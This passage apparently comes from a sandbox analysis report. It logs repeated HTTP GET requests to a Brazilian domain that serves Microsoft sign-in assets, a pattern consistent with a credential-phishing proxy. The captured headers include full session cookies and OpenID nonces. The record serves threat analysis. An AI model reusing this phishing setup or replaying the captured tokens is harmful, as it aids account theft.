IwLTQ0MDctOTI4Ni1jYjNlOWMxYWJhNzEmc3RhdGU9WHY5MFNmNENmWlFJcFE3WFFDQmFMUHYwMTRWcVd4dEk2d3dpbDBfZXdPRVNEc1BfQS1mOGEtN29CcTlQejdKZDhQcF9qcHJLQm1lR3ZodDdvU3RwR1ZUR1NlYkpacUdvNE1oN3h6eWdOZlh5V3ljQzFxSktEZ1ZLcV8xX3U1T0w4VFd5OFJnbWpBN3lzLS1RZDFhTjktSUFHc2F4aDVnWHpEYWZsZmp1NzBLZkc4eWMtamRHM2t2MzZWclY2THVXMGEwTkpaOTN4aHdnUXhkVG51S3NraDBaZnhYMGp2M29Ub2JqdGllQnRqd0pQNHdBTmZwbjlCNWdKVXN1TkFibFNmSGtJTlRtcVhPQ2dZRGtxUU9ZX2cmeC1jbGllbnQtU0tVPUlEX05FVDhfMCZ4LWNsaWVudC12ZXI9OC4zLjAuMA==&sso_reload=trueAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: qPdM=qVP87EaFGCQn; qPdM.sig=570GYc2IN2-96anUzPhqwcPBcBk; x-ms-gateway-slice=estsfd; stsservicecookie=estsfd; OH.FLID=e4bebde7-5ba4-49d8-b476-931756888516; .AspNetCore.OpenIdConnect.Nonce.49USBfOQied3yWeklneNnBRgMp5V6TCkW50B00X8sZN6-08gUP7C4VT8ltpLeyjKw6t0mWmXCmBMRZb3H0ziB4fa6mZ1mkbAWHlQ5aw3TxS6XAWJfHgahBcWIu2vzNCIOPDrnm96RaYKqI-252pJ-UZjV7QUHfdMfKdYx1uHnSjp6-HfVfS3Kmq9tXZM2YhpqlGz5i1CuYbEO2fzxB7icNR4fUgESr_VGJC8OYz2CXPlROML_6eU_GrG417A1wJo=N; .AspNetCore.Correlation.ZMc9lLc8XG_FHA7AsKemKsGhCyJShH-wCn7fNfhS9zc=N; esctx-jkXTnxbCM=AQABCQEAAABVrSpeuWamRam2jAF1XRQEDNAk-B-2E58z_H0-QJLvGLCw396iyFQ0SQlwZgT_rkZMOjIX0BlREk7SdS_3Gjck40Z4fztkvwmcn1sQXSriR2IzpxLrG5sEdaAuFg4w1VF7xM9sRR01IbnLTCxFsZcflc2zCEZkG2HUgNsPDnuWAiAA; AADSSO=NA|NoExtension; SSOCOOKIEPULLED=1; buid=1.AXUAMe_N-B6jSkuT5F9XHpElWltEZUfGMrBJg-Ydk3ZSdsoBAAB1AA.AQABGgEAAABVrSpeuWamRam2jAF1XRQEVTA4RXRMIoxXIbr9n-iyLGrqtPHzQRAW7rkde36tgl54eAYfT65Cw1l2I1F_yOUHXQ4Bf1-8uxohLxNhP3vhk1hOwXrHhhSan6gxhQJ0vFwgAA; esctx=PAQABBwEAAABVrSpeuWamRam2jAF1XRQEF9qztFF8TzKJ8yw-qNgY0YijTe-f6Gn3S_zDUdoMo8ADtwS0kOnPTxatotFeDv9eVfixtbrERDFOAClRQW0h4USvUoYGxKlKqwMOvcH4jVirT7FSHQ0PPhXWhWAwlg5LGVZHrA
            Source: global trafficHTTP traffic detected: GET /aadcdn.msauth.net/~/shared/1.0/content/js/asyncchunk/convergedlogin_pcustomizationloader_80e93b9a4cb13643afca.js HTTP/1.1Host: hapiinenstys.criadordeconexoes.com.brConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://hapiinenstys.criadordeconexoes.com.br/?piwg10otu=aHR0cHM6Ly9sb2dpbi5taWNyb3NvZnRvbmxpbmUuY29tL2NvbW1vbi9vYXV0aDIvdjIuMC9hdXRob3JpemU/Y2xpZW50X2lkPTQ3NjU0NDViLTMyYzYtNDliMC04M2U2LTFkOTM3NjUyNzZjYSZyZWRpcmVjdF91cmk9aHR0cHMlM0ElMkYlMkZ3d3cub2ZmaWNlLmNvbSUyRmxhbmRpbmd2MiZyZXNwb25zZV90eXBlPWNvZGUlMjBpZF90b2tlbiZzY29wZT1vcGVuaWQlMjBwcm9maWxlJTIwaHR0cHMlM0ElMkYlMkZ3d3cub2ZmaWNlLmNvbSUyRnYyJTJGT2ZmaWNlSG9tZS5BbGwmcmVzcG9uc2VfbW9kZT1mb3JtX3Bvc3Qmbm9uY2U9NjM4Nzc4MjY1NjUxMDA2ODgwLk5HWXdZakJoTkdFdE1qbGpZUzAwTW1VekxUaG1NRE10TVdFelpHUTNaR1prTlRNNFpqVTBOMkkxTjJFdE16Y3pNQzAwTURaaExXRXdaRGd0WWpWbFptRXlNbVUyWVdNeCZ1aV9sb2NhbGVzPWVuLVVTJm1rdD1lbi1VUyZjbGllbnQtcmVxdWVzdC1pZD0zOTE5ZDJiOC1lZjIwLTQ0MDctOTI4Ni1jYjNlOWMxYWJhNzEmc3RhdGU9WHY5MFNmNENmWlFJcFE3WFFDQmFMUHYwMTRWcVd4dEk2d3dpbDBfZXdPRVNEc1BfQS1mOGEtN29CcTlQejdKZDhQcF9qcHJLQm1lR3ZodDdvU3RwR1ZUR1NlYkpacUdvNE1oN3h6eWdOZlh5V3ljQzFxSktEZ1ZLcV8xX3U1T0w4VFd5OFJnbWpBN3lzLS1RZDFhTjktSUFHc2F4aDVnWHpEYWZsZmp1NzBLZkc4eWMtamRHM2t2MzZWclY2THVXMGEwTkpaOTN4aHdnUXhkVG51S3NraDBaZnhYMGp2M29Ub2JqdGllQnRqd0pQNHdBTmZwbjlCNWdKVXN1TkFibFNmSGtJTlRtcVhPQ2dZRGtxUU9ZX2cmeC1jbGllbnQtU0tVPUlEX05FVDhfMCZ4LWNsaWVudC12ZXI9OC4zLjAuMA==&sso_reload=trueAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: qPdM=qVP87EaFGCQn; qPdM.sig=570GYc2IN2-96anUzPhqwcPBcBk; x-ms-gateway-slice=estsfd; stsservicecookie=estsfd; OH.FLID=e4bebde7-5ba4-49d8-b476-931756888516; .AspNetCore.OpenIdConnect.Nonce.49USBfOQied3yWeklneNnBRgMp5V6TCkW50B00X8sZN6-08gUP7C4VT8ltpLeyjKw6t0mWmXCmBMRZb3H0ziB4fa6mZ1mkbAWHlQ5aw3TxS6XAWJfHgahBcWIu2vzNCIOPDrnm96RaYKqI-252pJ-UZjV7QUHfdMfKdYx1uHnSjp6-HfVfS3Kmq9tXZM2YhpqlGz5i1CuYbEO2fzxB7icNR4fUgESr_VGJC8OYz2CXPlROML_6eU_GrG417A1wJo=N; .AspNetCore.Correlation.ZMc9lLc8XG_FHA7AsKemKsGhCyJShH-wCn7fNfhS9zc=N; esctx-jkXTnxbCM=AQABCQEAAABVrSpeuWamRam2jAF1XRQEDNAk-B-2E58z_H0-QJLvGLCw396iyFQ0SQlwZgT_rkZMOjIX0BlREk7SdS_3Gjck40Z4fztkvwmcn1sQXSriR2IzpxLrG5sEdaAuFg4w1VF7xM9sRR01IbnLTCxFsZcflc2zCEZkG2HUgNsPDnuWAiAA; AADSSO=NA|NoExtension; SSOCOOKIEPULLED=1; buid=1.AXUAMe_N-B6jSkuT5F9XHpElWltEZUfGMrBJg-Ydk3ZSdsoBAAB1AA.AQABGgEAAABVrSpeuWamRam2jAF1XRQEVTA4RXRMIoxXIbr9n-iyLGrqtPHzQRAW7rkde36tgl54eAYfT65Cw1l2I1F_yOUHXQ4Bf1-8uxohLxNhP3vhk1hOwXrHhhSan6gxhQJ0vFwgAA; esctx=PAQABBwEAAABVrSpeuWamRam2jAF1XRQEF9qztFF8TzKJ8yw-qNgY0YijTe-f6Gn3S_zDUdoMo8ADtwS0kOnPTxatotFeDv9eVfixtbrERDFOAClRQW0h4USvUoYGxKlKqwMOvcH4jVirT7FSHQ0PPhXWhWAwlg5LGVZHrAvF9VazivTmPjaw1zPF1i3dl_I0Em_rxID5G6YgAA; es
            Source: global trafficHTTP traffic detected: GET /aadcdn.msauth.net/~/shared/1.0/content/images/backgrounds/2_bc3d32a696895f78c19df6c717586a5d.svg HTTP/1.1Host: hapiinenstys.criadordeconexoes.com.brConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://hapiinenstys.criadordeconexoes.com.br/?piwg10otu=aHR0cHM6Ly9sb2dpbi5taWNyb3NvZnRvbmxpbmUuY29tL2NvbW1vbi9vYXV0aDIvdjIuMC9hdXRob3JpemU/Y2xpZW50X2lkPTQ3NjU0NDViLTMyYzYtNDliMC04M2U2LTFkOTM3NjUyNzZjYSZyZWRpcmVjdF91cmk9aHR0cHMlM0ElMkYlMkZ3d3cub2ZmaWNlLmNvbSUyRmxhbmRpbmd2MiZyZXNwb25zZV90eXBlPWNvZGUlMjBpZF90b2tlbiZzY29wZT1vcGVuaWQlMjBwcm9maWxlJTIwaHR0cHMlM0ElMkYlMkZ3d3cub2ZmaWNlLmNvbSUyRnYyJTJGT2ZmaWNlSG9tZS5BbGwmcmVzcG9uc2VfbW9kZT1mb3JtX3Bvc3Qmbm9uY2U9NjM4Nzc4MjY1NjUxMDA2ODgwLk5HWXdZakJoTkdFdE1qbGpZUzAwTW1VekxUaG1NRE10TVdFelpHUTNaR1prTlRNNFpqVTBOMkkxTjJFdE16Y3pNQzAwTURaaExXRXdaRGd0WWpWbFptRXlNbVUyWVdNeCZ1aV9sb2NhbGVzPWVuLVVTJm1rdD1lbi1VUyZjbGllbnQtcmVxdWVzdC1pZD0zOTE5ZDJiOC1lZjIwLTQ0MDctOTI4Ni1jYjNlOWMxYWJhNzEmc3RhdGU9WHY5MFNmNENmWlFJcFE3WFFDQmFMUHYwMTRWcVd4dEk2d3dpbDBfZXdPRVNEc1BfQS1mOGEtN29CcTlQejdKZDhQcF9qcHJLQm1lR3ZodDdvU3RwR1ZUR1NlYkpacUdvNE1oN3h6eWdOZlh5V3ljQzFxSktEZ1ZLcV8xX3U1T0w4VFd5OFJnbWpBN3lzLS1RZDFhTjktSUFHc2F4aDVnWHpEYWZsZmp1NzBLZkc4eWMtamRHM2t2MzZWclY2THVXMGEwTkpaOTN4aHdnUXhkVG51S3NraDBaZnhYMGp2M29Ub2JqdGllQnRqd0pQNHdBTmZwbjlCNWdKVXN1TkFibFNmSGtJTlRtcVhPQ2dZRGtxUU9ZX2cmeC1jbGllbnQtU0tVPUlEX05FVDhfMCZ4LWNsaWVudC12ZXI9OC4zLjAuMA==&sso_reload=trueAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: qPdM=qVP87EaFGCQn; qPdM.sig=570GYc2IN2-96anUzPhqwcPBcBk; x-ms-gateway-slice=estsfd; stsservicecookie=estsfd; OH.FLID=e4bebde7-5ba4-49d8-b476-931756888516; .AspNetCore.OpenIdConnect.Nonce.49USBfOQied3yWeklneNnBRgMp5V6TCkW50B00X8sZN6-08gUP7C4VT8ltpLeyjKw6t0mWmXCmBMRZb3H0ziB4fa6mZ1mkbAWHlQ5aw3TxS6XAWJfHgahBcWIu2vzNCIOPDrnm96RaYKqI-252pJ-UZjV7QUHfdMfKdYx1uHnSjp6-HfVfS3Kmq9tXZM2YhpqlGz5i1CuYbEO2fzxB7icNR4fUgESr_VGJC8OYz2CXPlROML_6eU_GrG417A1wJo=N; .AspNetCore.Correlation.ZMc9lLc8XG_FHA7AsKemKsGhCyJShH-wCn7fNfhS9zc=N; esctx-jkXTnxbCM=AQABCQEAAABVrSpeuWamRam2jAF1XRQEDNAk-B-2E58z_H0-QJLvGLCw396iyFQ0SQlwZgT_rkZMOjIX0BlREk7SdS_3Gjck40Z4fztkvwmcn1sQXSriR2IzpxLrG5sEdaAuFg4w1VF7xM9sRR01IbnLTCxFsZcflc2zCEZkG2HUgNsPDnuWAiAA; AADSSO=NA|NoExtension; SSOCOOKIEPULLED=1; buid=1.AXUAMe_N-B6jSkuT5F9XHpElWltEZUfGMrBJg-Ydk3ZSdsoBAAB1AA.AQABGgEAAABVrSpeuWamRam2jAF1XRQEVTA4RXRMIoxXIbr9n-iyLGrqtPHzQRAW7rkde36tgl54eAYfT65Cw1l2I1F_yOUHXQ4Bf1-8uxohLxNhP3vhk1hOwXrHhhSan6gxhQJ0vFwgAA; esctx=PAQABBwEAAABVrSpeuWamRam2jAF1XRQEF9qztFF8TzKJ8yw-qNgY0YijTe-f6Gn3S_zDUdoMo8ADtwS0kOnPTxatotFeDv9eVfixtbrERDFOAClRQW0h4USvUoYGxKlKqwMOvcH4jVirT7FSHQ0PPhXWhWAwlg5LGVZHrA
            Source: global trafficHTTP traffic detected: GET /aadcdn.msauth.net/~/shared/1.0/content/images/microsoft_logo_ee5c8d9fb6248c938fd0dc19370e90bd.svg HTTP/1.1Host: hapiinenstys.criadordeconexoes.com.brConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://hapiinenstys.criadordeconexoes.com.br/?piwg10otu=aHR0cHM6Ly9sb2dpbi5taWNyb3NvZnRvbmxpbmUuY29tL2NvbW1vbi9vYXV0aDIvdjIuMC9hdXRob3JpemU/Y2xpZW50X2lkPTQ3NjU0NDViLTMyYzYtNDliMC04M2U2LTFkOTM3NjUyNzZjYSZyZWRpcmVjdF91cmk9aHR0cHMlM0ElMkYlMkZ3d3cub2ZmaWNlLmNvbSUyRmxhbmRpbmd2MiZyZXNwb25zZV90eXBlPWNvZGUlMjBpZF90b2tlbiZzY29wZT1vcGVuaWQlMjBwcm9maWxlJTIwaHR0cHMlM0ElMkYlMkZ3d3cub2ZmaWNlLmNvbSUyRnYyJTJGT2ZmaWNlSG9tZS5BbGwmcmVzcG9uc2VfbW9kZT1mb3JtX3Bvc3Qmbm9uY2U9NjM4Nzc4MjY1NjUxMDA2ODgwLk5HWXdZakJoTkdFdE1qbGpZUzAwTW1VekxUaG1NRE10TVdFelpHUTNaR1prTlRNNFpqVTBOMkkxTjJFdE16Y3pNQzAwTURaaExXRXdaRGd0WWpWbFptRXlNbVUyWVdNeCZ1aV9sb2NhbGVzPWVuLVVTJm1rdD1lbi1VUyZjbGllbnQtcmVxdWVzdC1pZD0zOTE5ZDJiOC1lZjIwLTQ0MDctOTI4Ni1jYjNlOWMxYWJhNzEmc3RhdGU9WHY5MFNmNENmWlFJcFE3WFFDQmFMUHYwMTRWcVd4dEk2d3dpbDBfZXdPRVNEc1BfQS1mOGEtN29CcTlQejdKZDhQcF9qcHJLQm1lR3ZodDdvU3RwR1ZUR1NlYkpacUdvNE1oN3h6eWdOZlh5V3ljQzFxSktEZ1ZLcV8xX3U1T0w4VFd5OFJnbWpBN3lzLS1RZDFhTjktSUFHc2F4aDVnWHpEYWZsZmp1NzBLZkc4eWMtamRHM2t2MzZWclY2THVXMGEwTkpaOTN4aHdnUXhkVG51S3NraDBaZnhYMGp2M29Ub2JqdGllQnRqd0pQNHdBTmZwbjlCNWdKVXN1TkFibFNmSGtJTlRtcVhPQ2dZRGtxUU9ZX2cmeC1jbGllbnQtU0tVPUlEX05FVDhfMCZ4LWNsaWVudC12ZXI9OC4zLjAuMA==&sso_reload=trueAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: qPdM=qVP87EaFGCQn; qPdM.sig=570GYc2IN2-96anUzPhqwcPBcBk; x-ms-gateway-slice=estsfd; stsservicecookie=estsfd; OH.FLID=e4bebde7-5ba4-49d8-b476-931756888516; .AspNetCore.OpenIdConnect.Nonce.49USBfOQied3yWeklneNnBRgMp5V6TCkW50B00X8sZN6-08gUP7C4VT8ltpLeyjKw6t0mWmXCmBMRZb3H0ziB4fa6mZ1mkbAWHlQ5aw3TxS6XAWJfHgahBcWIu2vzNCIOPDrnm96RaYKqI-252pJ-UZjV7QUHfdMfKdYx1uHnSjp6-HfVfS3Kmq9tXZM2YhpqlGz5i1CuYbEO2fzxB7icNR4fUgESr_VGJC8OYz2CXPlROML_6eU_GrG417A1wJo=N; .AspNetCore.Correlation.ZMc9lLc8XG_FHA7AsKemKsGhCyJShH-wCn7fNfhS9zc=N; esctx-jkXTnxbCM=AQABCQEAAABVrSpeuWamRam2jAF1XRQEDNAk-B-2E58z_H0-QJLvGLCw396iyFQ0SQlwZgT_rkZMOjIX0BlREk7SdS_3Gjck40Z4fztkvwmcn1sQXSriR2IzpxLrG5sEdaAuFg4w1VF7xM9sRR01IbnLTCxFsZcflc2zCEZkG2HUgNsPDnuWAiAA; AADSSO=NA|NoExtension; SSOCOOKIEPULLED=1; buid=1.AXUAMe_N-B6jSkuT5F9XHpElWltEZUfGMrBJg-Ydk3ZSdsoBAAB1AA.AQABGgEAAABVrSpeuWamRam2jAF1XRQEVTA4RXRMIoxXIbr9n-iyLGrqtPHzQRAW7rkde36tgl54eAYfT65Cw1l2I1F_yOUHXQ4Bf1-8uxohLxNhP3vhk1hOwXrHhhSan6gxhQJ0vFwgAA; esctx=PAQABBwEAAABVrSpeuWamRam2jAF1XRQEF9qztFF8TzKJ8yw-qNgY0YijTe-f6Gn3S_zDUdoMo8ADtwS0kOnPTxatotFeDv9eVfixtbrERDFOAClRQW0h4USvUoYGxKlKqwMOvcH4jVirT7FSHQ0PPhXWhWAwlg5LGVZHr
            Source: global trafficHTTP traffic detected: GET /aadcdn.msauth.net/~/shared/1.0/content/images/marching_ants_white_166de53471265253ab3a456defe6da23.gif HTTP/1.1Host: hapiinenstys.criadordeconexoes.com.brConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: qPdM=qVP87EaFGCQn; qPdM.sig=570GYc2IN2-96anUzPhqwcPBcBk; x-ms-gateway-slice=estsfd; stsservicecookie=estsfd; OH.FLID=e4bebde7-5ba4-49d8-b476-931756888516; .AspNetCore.OpenIdConnect.Nonce.49USBfOQied3yWeklneNnBRgMp5V6TCkW50B00X8sZN6-08gUP7C4VT8ltpLeyjKw6t0mWmXCmBMRZb3H0ziB4fa6mZ1mkbAWHlQ5aw3TxS6XAWJfHgahBcWIu2vzNCIOPDrnm96RaYKqI-252pJ-UZjV7QUHfdMfKdYx1uHnSjp6-HfVfS3Kmq9tXZM2YhpqlGz5i1CuYbEO2fzxB7icNR4fUgESr_VGJC8OYz2CXPlROML_6eU_GrG417A1wJo=N; .AspNetCore.Correlation.ZMc9lLc8XG_FHA7AsKemKsGhCyJShH-wCn7fNfhS9zc=N; esctx-jkXTnxbCM=AQABCQEAAABVrSpeuWamRam2jAF1XRQEDNAk-B-2E58z_H0-QJLvGLCw396iyFQ0SQlwZgT_rkZMOjIX0BlREk7SdS_3Gjck40Z4fztkvwmcn1sQXSriR2IzpxLrG5sEdaAuFg4w1VF7xM9sRR01IbnLTCxFsZcflc2zCEZkG2HUgNsPDnuWAiAA; AADSSO=NA|NoExtension; SSOCOOKIEPULLED=1; buid=1.AXUAMe_N-B6jSkuT5F9XHpElWltEZUfGMrBJg-Ydk3ZSdsoBAAB1AA.AQABGgEAAABVrSpeuWamRam2jAF1XRQEVTA4RXRMIoxXIbr9n-iyLGrqtPHzQRAW7rkde36tgl54eAYfT65Cw1l2I1F_yOUHXQ4Bf1-8uxohLxNhP3vhk1hOwXrHhhSan6gxhQJ0vFwgAA; esctx=PAQABBwEAAABVrSpeuWamRam2jAF1XRQEF9qztFF8TzKJ8yw-qNgY0YijTe-f6Gn3S_zDUdoMo8ADtwS0kOnPTxatotFeDv9eVfixtbrERDFOAClRQW0h4USvUoYGxKlKqwMOvcH4jVirT7FSHQ0PPhXWhWAwlg5LGVZHrAvF9VazivTmPjaw1zPF1i3dl_I0Em_rxID5G6YgAA; esctx-rd9uwk5JNAs=AQABCQEAAABVrSpeuWamRam2jAF1XRQEwzs_ase4bdeAJM7aGxvEK2c5L1QtB0NKAZv4B1UaWjL-AK_Cu__6qtcBJFGQH8nRp--TMNQSmnrYyl6ag0NqYCBPdvaZXGiF7AEaKfUfsdQJzkae4DNOLp5iu5z_Bkw-6jheXkX-xKMjBcl_UvWeliAA; fpc=AjUAFJMlP0ZCgsS-Ll1segK8Ae7AAQAAAAdIat8OAAAA; brcap=0
            Source: global trafficHTTP traffic detected: GET /aadcdn.msauth.net/~/shared/1.0/content/images/favicon_a_eupayfgghqiai7k9sol6lg2.ico HTTP/1.1Host: hapiinenstys.criadordeconexoes.com.brConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: qPdM=qVP87EaFGCQn; qPdM.sig=570GYc2IN2-96anUzPhqwcPBcBk; x-ms-gateway-slice=estsfd; stsservicecookie=estsfd; OH.FLID=e4bebde7-5ba4-49d8-b476-931756888516; .AspNetCore.OpenIdConnect.Nonce.49USBfOQied3yWeklneNnBRgMp5V6TCkW50B00X8sZN6-08gUP7C4VT8ltpLeyjKw6t0mWmXCmBMRZb3H0ziB4fa6mZ1mkbAWHlQ5aw3TxS6XAWJfHgahBcWIu2vzNCIOPDrnm96RaYKqI-252pJ-UZjV7QUHfdMfKdYx1uHnSjp6-HfVfS3Kmq9tXZM2YhpqlGz5i1CuYbEO2fzxB7icNR4fUgESr_VGJC8OYz2CXPlROML_6eU_GrG417A1wJo=N; .AspNetCore.Correlation.ZMc9lLc8XG_FHA7AsKemKsGhCyJShH-wCn7fNfhS9zc=N; esctx-jkXTnxbCM=AQABCQEAAABVrSpeuWamRam2jAF1XRQEDNAk-B-2E58z_H0-QJLvGLCw396iyFQ0SQlwZgT_rkZMOjIX0BlREk7SdS_3Gjck40Z4fztkvwmcn1sQXSriR2IzpxLrG5sEdaAuFg4w1VF7xM9sRR01IbnLTCxFsZcflc2zCEZkG2HUgNsPDnuWAiAA; AADSSO=NA|NoExtension; SSOCOOKIEPULLED=1; buid=1.AXUAMe_N-B6jSkuT5F9XHpElWltEZUfGMrBJg-Ydk3ZSdsoBAAB1AA.AQABGgEAAABVrSpeuWamRam2jAF1XRQEVTA4RXRMIoxXIbr9n-iyLGrqtPHzQRAW7rkde36tgl54eAYfT65Cw1l2I1F_yOUHXQ4Bf1-8uxohLxNhP3vhk1hOwXrHhhSan6gxhQJ0vFwgAA; esctx=PAQABBwEAAABVrSpeuWamRam2jAF1XRQEF9qztFF8TzKJ8yw-qNgY0YijTe-f6Gn3S_zDUdoMo8ADtwS0kOnPTxatotFeDv9eVfixtbrERDFOAClRQW0h4USvUoYGxKlKqwMOvcH4jVirT7FSHQ0PPhXWhWAwlg5LGVZHrAvF9VazivTmPjaw1zPF1i3dl_I0Em_rxID5G6YgAA; esctx-rd9uwk5JNAs=AQABCQEAAABVrSpeuWamRam2jAF1XRQEwzs_ase4bdeAJM7aGxvEK2c5L1QtB0NKAZv4B1UaWjL-AK_Cu__6qtcBJFGQH8nRp--TMNQSmnrYyl6ag0NqYCBPdvaZXGiF7AEaKfUfsdQJzkae4DNOLp5iu5z_Bkw-6jheXkX-xKMjBcl_UvWeliAA; fpc=AjUAFJMlP0ZCgsS-Ll1segK8Ae7AAQAAAAdIat8OAAAA; brcap=0
            Source: global trafficHTTP traffic detected: GET /aadcdn.msauth.net/~/shared/1.0/content/images/marching_ants_b540a8e518037192e32c4fe58bf2dbab.gif HTTP/1.1Host: hapiinenstys.criadordeconexoes.com.brConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: qPdM=qVP87EaFGCQn; qPdM.sig=570GYc2IN2-96anUzPhqwcPBcBk; x-ms-gateway-slice=estsfd; stsservicecookie=estsfd; OH.FLID=e4bebde7-5ba4-49d8-b476-931756888516; .AspNetCore.OpenIdConnect.Nonce.49USBfOQied3yWeklneNnBRgMp5V6TCkW50B00X8sZN6-08gUP7C4VT8ltpLeyjKw6t0mWmXCmBMRZb3H0ziB4fa6mZ1mkbAWHlQ5aw3TxS6XAWJfHgahBcWIu2vzNCIOPDrnm96RaYKqI-252pJ-UZjV7QUHfdMfKdYx1uHnSjp6-HfVfS3Kmq9tXZM2YhpqlGz5i1CuYbEO2fzxB7icNR4fUgESr_VGJC8OYz2CXPlROML_6eU_GrG417A1wJo=N; .AspNetCore.Correlation.ZMc9lLc8XG_FHA7AsKemKsGhCyJShH-wCn7fNfhS9zc=N; esctx-jkXTnxbCM=AQABCQEAAABVrSpeuWamRam2jAF1XRQEDNAk-B-2E58z_H0-QJLvGLCw396iyFQ0SQlwZgT_rkZMOjIX0BlREk7SdS_3Gjck40Z4fztkvwmcn1sQXSriR2IzpxLrG5sEdaAuFg4w1VF7xM9sRR01IbnLTCxFsZcflc2zCEZkG2HUgNsPDnuWAiAA; AADSSO=NA|NoExtension; SSOCOOKIEPULLED=1; buid=1.AXUAMe_N-B6jSkuT5F9XHpElWltEZUfGMrBJg-Ydk3ZSdsoBAAB1AA.AQABGgEAAABVrSpeuWamRam2jAF1XRQEVTA4RXRMIoxXIbr9n-iyLGrqtPHzQRAW7rkde36tgl54eAYfT65Cw1l2I1F_yOUHXQ4Bf1-8uxohLxNhP3vhk1hOwXrHhhSan6gxhQJ0vFwgAA; esctx=PAQABBwEAAABVrSpeuWamRam2jAF1XRQEF9qztFF8TzKJ8yw-qNgY0YijTe-f6Gn3S_zDUdoMo8ADtwS0kOnPTxatotFeDv9eVfixtbrERDFOAClRQW0h4USvUoYGxKlKqwMOvcH4jVirT7FSHQ0PPhXWhWAwlg5LGVZHrAvF9VazivTmPjaw1zPF1i3dl_I0Em_rxID5G6YgAA; esctx-rd9uwk5JNAs=AQABCQEAAABVrSpeuWamRam2jAF1XRQEwzs_ase4bdeAJM7aGxvEK2c5L1QtB0NKAZv4B1UaWjL-AK_Cu__6qtcBJFGQH8nRp--TMNQSmnrYyl6ag0NqYCBPdvaZXGiF7AEaKfUfsdQJzkae4DNOLp5iu5z_Bkw-6jheXkX-xKMjBcl_UvWeliAA; fpc=AjUAFJMlP0ZCgsS-Ll1segK8Ae7AAQAAAAdIat8OAAAA; brcap=0
            Source: global trafficHTTP traffic detected: GET /aadcdn.msauth.net/~/shared/1.0/content/images/microsoft_logo_ee5c8d9fb6248c938fd0dc19370e90bd.svg HTTP/1.1Host: hapiinenstys.criadordeconexoes.com.brConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: qPdM=qVP87EaFGCQn; qPdM.sig=570GYc2IN2-96anUzPhqwcPBcBk; x-ms-gateway-slice=estsfd; stsservicecookie=estsfd; OH.FLID=e4bebde7-5ba4-49d8-b476-931756888516; .AspNetCore.OpenIdConnect.Nonce.49USBfOQied3yWeklneNnBRgMp5V6TCkW50B00X8sZN6-08gUP7C4VT8ltpLeyjKw6t0mWmXCmBMRZb3H0ziB4fa6mZ1mkbAWHlQ5aw3TxS6XAWJfHgahBcWIu2vzNCIOPDrnm96RaYKqI-252pJ-UZjV7QUHfdMfKdYx1uHnSjp6-HfVfS3Kmq9tXZM2YhpqlGz5i1CuYbEO2fzxB7icNR4fUgESr_VGJC8OYz2CXPlROML_6eU_GrG417A1wJo=N; .AspNetCore.Correlation.ZMc9lLc8XG_FHA7AsKemKsGhCyJShH-wCn7fNfhS9zc=N; esctx-jkXTnxbCM=AQABCQEAAABVrSpeuWamRam2jAF1XRQEDNAk-B-2E58z_H0-QJLvGLCw396iyFQ0SQlwZgT_rkZMOjIX0BlREk7SdS_3Gjck40Z4fztkvwmcn1sQXSriR2IzpxLrG5sEdaAuFg4w1VF7xM9sRR01IbnLTCxFsZcflc2zCEZkG2HUgNsPDnuWAiAA; AADSSO=NA|NoExtension; SSOCOOKIEPULLED=1; 